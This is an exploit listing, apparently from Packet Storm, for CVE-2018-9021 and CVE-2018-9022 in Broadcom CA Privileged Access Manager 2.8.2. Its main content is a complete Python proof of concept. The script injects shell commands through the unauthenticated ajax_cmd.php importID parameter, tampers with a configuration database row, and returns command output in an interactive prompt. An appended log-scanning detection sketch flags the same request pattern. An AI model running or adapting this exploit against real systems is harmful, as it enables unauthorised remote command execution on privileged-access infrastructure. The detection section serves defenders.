
Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

🗓️ 05 Dec 2019 00:00:00 | Reported by Peter Lapp | Type: packetstorm | 🔗 packetstormsecurity.com | 👁 360 Views

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution by Peter Lapp

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Broadcom CA Privileged Access Manager 2.8.2 - Remote Command Execution Exploit #RCE | 5 Dec 2019 00:00 | zdt |
| ATTACKERKB | CVE-2018-9022 | 18 Jun 2018 18:29 | attackerkb |
| ATTACKERKB | CVE-2018-9021 | 18 Jun 2018 18:29 | attackerkb |
| Circl | CVE-2018-9021 | 5 Dec 2019 00:00 | circl |
| Circl | CVE-2018-9022 | 5 Dec 2019 00:00 | circl |
| CNVD | CA Privileged Access Manager Authentication Bypass Vulnerability | 19 Jun 2018 00:00 | cnvd |
| CNVD | CA Privileged Access Manager Authentication Bypass Vulnerability | 19 Jun 2018 00:00 | cnvd |
| Check Point Advisories | Broadcom CA Privileged Access Manager Remote Command Execution (CVE-2018-9021; CVE-2018-9022) | 8 Dec 2019 00:00 | checkpoint_advisories |
| CVE | CVE-2018-9021 | 18 Jun 2018 18:00 | cve |
| CVE | CVE-2018-9022 | 18 Jun 2018 18:00 | cve |

Code
```python
# Title: Broadcom CA Privileged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    cmd = urllib.quote_plus(cmd)
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']

def get_db_value():
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value

def encode_payload(cmd):
    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd

def restore_sql(value):
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)

def main():
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''

    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()

    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'

    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        restore_sql(orig_value)


if __name__ == "__main__":
    main()
```
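
For defenders, the request shape the PoC relies on (`/ajax_cmd.php` with `cmd=AD_IMPORT` and shell metacharacters in `importID`) can be hunted for in the appliance's web access logs. The following Python 3 detection sketch is an added example, not part of the original PoC or any vendor tooling; the combined log format, the sample lines and the assumption that legitimate `importID` values contain no shell metacharacters are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate importID is a plain identifier, so any character
# that is meaningful to a shell is treated as an injection indicator.
SHELL_META = re.compile(r"[|;&`$<>(){}\\\n\r]")
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Dec/2019:10:00:01 +0000] "GET /ajax_cmd.php?cmd=AD_IMPORT'
    '&command=add&groupId=123&importID=|id+2>%261||&deviceMode=test HTTP/1.1" 200 64',
    '192.0.2.10 - - [05/Dec/2019:10:00:05 +0000] "GET /ajax_cmd.php?cmd=AD_IMPORT'
    '&command=add&groupId=123&importID=42&deviceMode=test HTTP/1.1" 200 31',
    '192.0.2.10 - - [05/Dec/2019:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 512',
]

def suspicious_ad_import(line):
    """Return the URL-decoded importID if the line matches the PoC's request shape."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/ajax_cmd.php"):
        return None
    # parse_qs percent-decodes values, so %7C and a raw | are treated alike.
    params = parse_qs(url.query, keep_blank_values=True)
    if "AD_IMPORT" not in params.get("cmd", []):
        return None
    for value in params.get("importID", []):
        if SHELL_META.search(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded importID) for every flagged log line."""
    hits = []
    for line in lines:
        value = suspicious_ad_import(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"ALERT {ip} importID={value!r}")
```

Because the PoC reaches `ajax_cmd.php` without logging in, any hit from this rule on an unpatched appliance warrants review of the `ssl_vpn_network` row in `configuration_f` and of `/tmp/output`, both of which the PoC touches.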
